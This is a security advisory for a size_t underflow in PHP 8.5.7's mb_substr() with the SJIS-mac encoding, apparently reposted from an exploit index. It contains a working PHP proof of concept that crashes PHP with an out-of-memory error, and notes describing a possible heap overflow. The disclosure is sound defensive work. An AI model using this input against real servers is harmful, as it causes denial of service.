Share
## https://sploitus.com/exploit?id=PACKETSTORM:223961
# PHP 8.5.7 `mb_substr()` 'SJIS-mac' size_t underflow
    
    **Author:** Khashayar Fereidani
    **Disclosure Date:** 2026-06-18
    **Advisory:** https://fereidani.com/php-857-mbsubstr-sjis-mac-sizet-underflow
    **Contact:** https://fereidani.com/contact
    
    ## Description
    
    The `mb_get_substr()` function in `ext/mbstring/mbstring.c`
    deliberately skips an early empty return guard for the `SJIS-mac`
    encoding when `from >= in_len`. As a result, it falls through to
    `mb_get_substr_slow()`, executing `mb_convert_buf_init(&buf, MIN(len,
    in_len - from), ...);`. When `from > in_len`, the parameter `in_len -
    from` underflows the `size_t` representation, resulting in a vastly
    large allocation size (near ~2^64 bytes). This leads to an immediate
    Out-Of-Memory (OOM) fatal error. Furthermore, if
    `_ZSTR_STRUCT_SIZE(initsize)` wraps past `SIZE_MAX`, it could
    potentially allocate a tiny buffer while the structural limit retains
    the pseudo-wild value, resulting in a heap buffer overflow when
    subsequent codepoints are decoded and written.
    
    ## Proof of concept
    
    ```php
    <?php
    /*
     * PoC: mb_substr() 'SJIS-mac' size_t underflow
     * File:  ext/mbstring/mbstring.c  mb_get_substr() (~L2129) +
    mb_get_substr_slow() (~L2102) *
     * mb_get_substr() deliberately skips the early "return empty" guard
    for SJIS-mac:
     *
     *     if (len == 0 || (from >= in_len && enc != &mbfl_encoding_sjis_mac)) {
     *         return zend_empty_string;     // <-- sjis_mac bypasses this
    when from >= in_len
     *     }
     *
     * ... then falls through (sjis_mac is multibyte, not SBCS/WCS2/WCS4) to
     * mb_get_substr_slow(), whose first line is:
     *
     *     mb_convert_buf_init(&buf, MIN(len, in_len - from), ...);
     *
     * With `from > in_len` (bytes), `in_len - from` UNDERFLOWS size_t to ~2^64.
     * mb_convert_buf_init does emalloc(_ZSTR_STRUCT_SIZE(initsize)).
     *
     * Two outcomes, both wrong (correct result is the empty string):
     *  (A) `from` huge -> initsize ~2^64 -> fatal "Allowed memory size exhausted
     *      (tried to allocate 18446744073708551644 bytes)". CONFIRMED below.
     *  (B) `from` only slightly > in_len -> initsize sits just under 2^64 and
     *      _ZSTR_STRUCT_SIZE(initsize) WRAPS past SIZE_MAX to a tiny allocation,
     *      while buf->limit = out + initsize stays wild -> a subsequent write of
     *      decoded codepoints is a HEAP OVERFLOW. (Harder to trigger reliably:
     *      needs a SJIS-mac input decoding to more codepoints than bytes, i.e.
     *      from < codepoint_count while from > byte_count. Worth upstream review.)
     */
    echo "PHP ", PHP_VERSION, "  sjis_mac available: ",
         (in_array("SJIS-mac", mb_list_encodings()) ? "yes" : "no"), "\n\n";
    
    /* control: a normal encoding with from > strlen returns "" cleanly */
    echo "UTF-8, from=10 > strlen('abc'): -> "; var_dump(@mb_substr("abc",
    10, null, "UTF-8"));
    
    /* The bug: SJIS-mac, from >> strlen, length omitted -> underflow -> OOM fatal.
     * The "tried to allocate 18...644 bytes" is literally (size_t)(3 - 1000000). */
    echo "SJIS-mac, from=1000000 > strlen('abc'):\n";
    @mb_substr("abc", 1000000, null, "SJIS-mac");
    echo "(if you see this line, the fatal error above was caught/suppressed)\n";
    ```
    
    ## Impact
    
    An attacker could intentionally furnish conditions where `from >
    in_len` alongside the 'SJIS-mac' encoding, triggering a `size_t`
    underflow. This predictably causes a severe Out-Of-Memory (OOM) fatal
    error, culminating in a Denial of Service. Depending on environmental
    details, it might hypothetically cause a heap buffer overflow.
    
    ## Solution
    
    Adjust the constraints inside `mb_get_substr()` and
    `mb_get_substr_slow()` in `ext/mbstring/mbstring.c`. The calculation
    `in_len - from` should be adequately bounds-checked to halt
    computation or safely cap at zero when `from > in_len`, sidestepping
    the underflow when initializing string buffers.